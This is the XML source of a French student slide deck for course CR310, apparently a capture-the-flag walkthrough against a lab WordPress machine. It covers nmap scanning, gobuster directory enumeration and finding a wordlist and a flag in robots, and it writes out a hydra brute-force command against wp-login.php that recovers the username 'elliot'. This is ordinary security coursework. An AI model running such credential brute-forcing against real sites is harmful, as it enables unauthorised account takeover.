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58" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="273" r:id="rId18"/>
    <p:sldId id="268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E3535-1AB6-4CC2-9692-F3659E36D0B0}" v="1507" dt="2022-11-05T01:07:3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662B-8E5A-44B4-92C5-591ED2A9F3B6}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>04/11/2022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0F9F-4DD7-4F59-A348-D1191BDDBA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0.10.186.10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0.10.186.105/wp-log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0.10.186105/robo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0.10.186105/robo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?port=44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772400" cy="1857388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t>Cours: CR310</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CA" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t>Automne 2022</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CA" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t>Devoir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214314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Membre de groupe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t>1- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0" err="1"/>
              <a:t>Najia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0" err="1"/>
              <a:t>Lamsaouri</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t>2- Mohamed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0" err="1"/>
              <a:t>Malick</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t>3- Mamadou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0" err="1"/>
              <a:t>Madiou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0"/>
              <a:t> DIALLO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1- Phase de reconnaissance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C5866C0-F4F9-F6A5-AB38-207FA78CC9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041292" y="2192364"/>
            <a:ext cx="7184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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Nous avons </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>utiliser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> pour chercher les ports qui sont ouverts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>  –T4  10.10.186.105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0F8B535-B094-52C0-07A4-0DCA4FF1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46" y="3525514"/>
            <a:ext cx="6314267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1- Phase de reconnaissance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C5866C0-F4F9-F6A5-AB38-207FA78CC9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009004" y="2566906"/>
            <a:ext cx="71841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Comme nous avons constaté </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> la page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>precedente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, le por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>est ouvert sur donc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> partir de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, nous pouvons chercher plus de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> sur ce port avec la commande ci-dessous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>  –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -p  10.10.186.105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53AB2ED-701D-0086-EBF4-18F35FE1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97" y="3955258"/>
            <a:ext cx="5687877" cy="20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091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488" y="1193369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2- Phase d'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" err="1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C5866C0-F4F9-F6A5-AB38-207FA78CC9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="847563" y="1669296"/>
            <a:ext cx="76103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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Comme nous savons a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>present</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> que nous avons un site web qui roule sur un serveur Apache sur le port 80, nous pouvons chercher des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>repertoires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> exploitables sur le site avec la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gobuster</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> –u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://10.10.186.105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wordlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/directory-list-2.3-medium.txt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8944356B-3701-B3A8-FA4B-F6C6F0AC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31" y="2382229"/>
            <a:ext cx="5203555" cy="43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107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4912" y="1257946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1- Phase de reconnaissance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C5866C0-F4F9-F6A5-AB38-207FA78CC9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757156" y="1785533"/>
            <a:ext cx="718411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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Nous avons fini par trouver une page avec le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>repertoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>aui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> nous indique que la page web est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>developpé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> sur Wordpress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://10.10.186.105/wp-login</a:t>
            </a:r>
          </a:p>
          <a:p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Le prochain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>defi</a:t>
            </a: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 sera de trouver un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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A7E334D2-B12E-899D-7323-57A2374F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1" y="2811242"/>
            <a:ext cx="6359471" cy="39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429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2- Phase d'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" err="1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FB28D51-130B-ED3D-61C7-20442C80D477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702266" y="2235952"/>
            <a:ext cx="69500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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Plus loin nous avons ouvert trouvé plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>interessant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>repertoires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> robots que nous avons trouvé plus haut: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Un dictionnaire et un flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Http://10.10.186105/robots</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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5F512F3B-8BE5-9704-13F6-57D494EC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2" y="3136236"/>
            <a:ext cx="3046709" cy="908409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320F590-7121-0FF4-C237-A50DB61E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77" y="3254936"/>
            <a:ext cx="3143572" cy="18333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423095F-3060-E9FD-99D4-AF8D8E7D96ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5093453" y="2978580"/>
            <a:ext cx="2034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Le Dictionnaire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C590697-3FE3-97A5-3D58-46A32B7E9F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815275" y="4375042"/>
            <a:ext cx="219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Le flag</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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A25BEA9A-C57B-8759-E2BE-101DBA0E7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76" y="4706680"/>
            <a:ext cx="3498742" cy="8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8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2- Phase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>d'Enumération</a:t>
            </a:r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FB28D51-130B-ED3D-61C7-20442C80D477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702266" y="2235952"/>
            <a:ext cx="69500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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Plus loin nous avons ouvert trouvé plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>intéressant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>répertoires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> robots que nous avons trouvé plus haut: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Un dictionnaire et un flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Http://10.10.186105/robots</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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5F512F3B-8BE5-9704-13F6-57D494EC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2" y="3136236"/>
            <a:ext cx="3046709" cy="908409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320F590-7121-0FF4-C237-A50DB61E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77" y="3254936"/>
            <a:ext cx="3143572" cy="18333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423095F-3060-E9FD-99D4-AF8D8E7D96ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5093453" y="2978580"/>
            <a:ext cx="2034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Le Dictionnaire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C590697-3FE3-97A5-3D58-46A32B7E9F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815275" y="4375042"/>
            <a:ext cx="219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Le flag</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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A25BEA9A-C57B-8759-E2BE-101DBA0E7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76" y="4706680"/>
            <a:ext cx="3498742" cy="8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8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3- Phase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>d‘Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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785926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Nous allons utiliser ce dictionnaire pour faire un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>et trouver un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>username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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>avec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hydra</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Pour trouver le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> -L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Downloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sorted_fosocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pasbesoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> 10.10.186.105 http-post-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> '/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;pw-submit=log+In:F=Invalid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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429000"/>
            <a:ext cx="8181990" cy="219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857356" y="307181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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0" smtClean="0"/>
              <a:t> trouvé: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>elliot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65647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3- Phase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
